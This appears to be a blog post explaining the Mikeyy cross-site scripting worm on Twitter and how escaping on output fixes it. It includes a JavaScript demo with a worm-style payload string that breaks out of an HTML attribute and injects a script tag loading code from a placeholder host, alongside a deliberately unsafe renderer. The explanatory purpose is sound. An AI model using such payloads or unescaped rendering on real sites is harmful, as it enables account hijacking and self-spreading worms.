It's now the fourth wave of attacks on Twitter … the Mikeyy worm not only infects every user who views an infected tweet through the web interface, it also mocks Twitter. Besides links to infected profiles, it tweets “Don’t blame mikeyy, its twitters fault” or “Twitter hire Mikeyy” … a clear statement that Twitter’s programmers don’t seem to know enough about cross-site scripting.
How does the worm work? Simple: cross-site scripting (XSS). The account name closes the surrounding tag with "> and then opens a <script> tag; the JavaScript in it runs in the browser of whoever views the profile and, using that viewer's logged-in session, writes the same payload into the viewer's own name. It works because the code is executed by the browser, which happens as soon as you use Twitter's web interface, since the name of the tweep is rendered there without being escaped.
How to solve this? Twitter needs to escape user-supplied data whenever it is rendered into HTML, and as a second line of defence reject script markup in profile fields when they are submitted to the server … basic knowledge, one would think. They also need to strip the script from the already infected profiles and tweets. Until that happens, I'd advise everyone not to use Twitter's web interface but to stick to other Twitter clients.
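To make the break-out in the previous paragraph and the fix in this one concrete, here is an added example (my own code, not Twitter's and not the worm's). It assumes a simplified profile template, a constructed payload in the style of the worm with a placeholder script URL, and a toy model of the browser in which any real <script> markup that reaches the page runs with the viewer's session and rewrites the viewer's profile, which is what the worm did. Rendering the name unescaped lets one infected profile take over every viewer in turn; escaping it on output stops the spread.

```javascript
// Added example: attribute-context XSS break-out versus HTML-escaping on output,
// plus a toy simulation of how the worm spread from profile to profile.
// Constructed for illustration; worm.example is a placeholder, not a real host.

// Constructed payload in the worm's style: close the attribute and the tag,
// inject a script element, then re-open an attribute so the rest of the
// template still parses.
const WORM_NAME = '"><script src="http://worm.example/x.js"></script><a title="';

// Escape the five characters that can change context in HTML body or
// double-quoted attribute position. (Not sufficient for JS, URL or CSS contexts.)
function escapeHtml(s) {
  return String(s).replace(/[&<>"']/g, (c) => ({
    '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;',
  })[c]);
}

// Vulnerable rendering: the user-controlled name is concatenated raw into markup.
function renderProfileUnsafe(name) {
  return `<a href="/profile" title="${name}">${name}</a>`;
}

// Fixed rendering: every interpolation of untrusted data is escaped for HTML.
function renderProfileSafe(name) {
  const n = escapeHtml(name);
  return `<a href="/profile" title="${n}">${n}</a>`;
}

// Does the rendered markup contain a real (unescaped) script tag?
function containsScriptTag(html) {
  return /<script\b/i.test(html);
}

// Toy browser model: a viewer loads another user's profile. If real <script>
// markup reaches the page, it runs with the viewer's session and, as the worm
// did, overwrites the viewer's own name with the payload.
function simulateVisit(profiles, viewer, viewed, render) {
  const html = render(profiles.get(viewed));
  if (containsScriptTag(html)) profiles.set(viewer, WORM_NAME);
  return html;
}

function infectedCount(profiles) {
  let n = 0;
  for (const name of profiles.values()) if (name === WORM_NAME) n++;
  return n;
}

// Constructed outbreak: one infected account, three clean ones, and a chain of
// page views in which each victim looks at the previous victim's profile.
function runOutbreak(render) {
  const profiles = new Map([
    ['mikeyy', WORM_NAME],
    ['alice', 'Alice'],
    ['bob', 'Bob'],
    ['carol', 'Carol'],
  ]);
  simulateVisit(profiles, 'alice', 'mikeyy', render);
  simulateVisit(profiles, 'bob', 'alice', render);
  simulateVisit(profiles, 'carol', 'bob', render);
  return infectedCount(profiles);
}

console.log('unsafe rendering, infected accounts:', runOutbreak(renderProfileUnsafe)); // 4
console.log('escaped rendering, infected accounts:', runOutbreak(renderProfileSafe));  // 1
```

The point of the escaping function is that it is applied at output time, for the context the data lands in; a submission-time filter can be bypassed by encodings the filter did not anticipate, and it does nothing for data that is already stored. The simulation is deliberately crude (a regex stands in for the HTML parser and script engine) but it shows why one unescaped field is enough for a self-propagating worm.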